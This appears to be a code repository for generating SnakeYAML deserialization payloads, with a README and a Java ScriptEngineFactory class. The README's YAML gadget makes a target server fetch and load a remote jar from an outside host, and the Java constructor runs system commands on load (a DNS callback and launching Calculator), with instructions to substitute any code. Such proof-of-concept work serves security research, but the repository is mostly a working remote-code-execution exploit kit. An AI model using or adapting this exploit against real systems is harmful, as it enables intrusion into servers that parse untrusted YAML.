├── .gitignore ├── README.md └── src ├── META-INF └── services │ └── javax.script.ScriptEngineFactory └── artsploit └── AwesomeScriptEngineFactory.java /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | ./out/* 3 | ./yaml-payload.jar 4 | ./yaml-payload.yml -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | A tiny project for generating payloads for the SnakeYAML deserialization gadget (taken from https://github.com/mbechler/marshalsec): 2 | ```yaml 3 | !!javax.script.ScriptEngineManager [ 4 | !!java.net.URLClassLoader [[ 5 | !!java.net.URL ["http://artsploit.com/yaml-payload.jar"] 6 | ]] 7 | ] 8 | ``` 9 | Put the java code you want execute into [AwesomeScriptEngineFactory.java](./src/artsploit/AwesomeScriptEngineFactory.java) and compile: 10 | ```bash 11 | javac src/artsploit/AwesomeScriptEngineFactory.java 12 | jar -cvf yaml-payload.jar -C src/ . 13 | ``` 14 | 15 | Then place the 'yaml-payload.jar' file in to the web server folder (e.g. artsploit.com/yaml-payload.jar) 16 | -------------------------------------------------------------------------------- /src/META-INF/services/javax.script.ScriptEngineFactory: -------------------------------------------------------------------------------- 1 | artsploit.AwesomeScriptEngineFactory -------------------------------------------------------------------------------- /src/artsploit/AwesomeScriptEngineFactory.java: -------------------------------------------------------------------------------- 1 | package artsploit; 2 | 3 | import javax.script.ScriptEngine; 4 | import javax.script.ScriptEngineFactory; 5 | import java.io.IOException; 6 | import java.util.List; 7 | 8 | public class AwesomeScriptEngineFactory implements ScriptEngineFactory { 9 | 10 | public AwesomeScriptEngineFactory() { 11 | try { 12 | Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com"); 13 | Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator"); 14 | } catch (IOException e) { 15 | e.printStackTrace(); 16 | } 17 | } 18 | 19 | @Override 20 | public String getEngineName() { 21 | return null; 22 | } 23 | 24 | @Override 25 | public String getEngineVersion() { 26 | return null; 27 | } 28 | 29 | @Override 30 | public List getExtensions() { 31 | return null; 32 | } 33 | 34 | @Override 35 | public List getMimeTypes() { 36 | return null; 37 | } 38 | 39 | @Override 40 | public List getNames() { 41 | return null; 42 | } 43 | 44 | @Override 45 | public String getLanguageName() { 46 | return null; 47 | } 48 | 49 | @Override 50 | public String getLanguageVersion() { 51 | return null; 52 | } 53 | 54 | @Override 55 | public Object getParameter(String key) { 56 | return null; 57 | } 58 | 59 | @Override 60 | public String getMethodCallSyntax(String obj, String m, String... args) { 61 | return null; 62 | } 63 | 64 | @Override 65 | public String getOutputStatement(String toDisplay) { 66 | return null; 67 | } 68 | 69 | @Override 70 | public String getProgram(String... statements) { 71 | return null; 72 | } 73 | 74 | @Override 75 | public ScriptEngine getScriptEngine() { 76 | return null; 77 | } 78 | } 79 | --------------------------------------------------------------------------------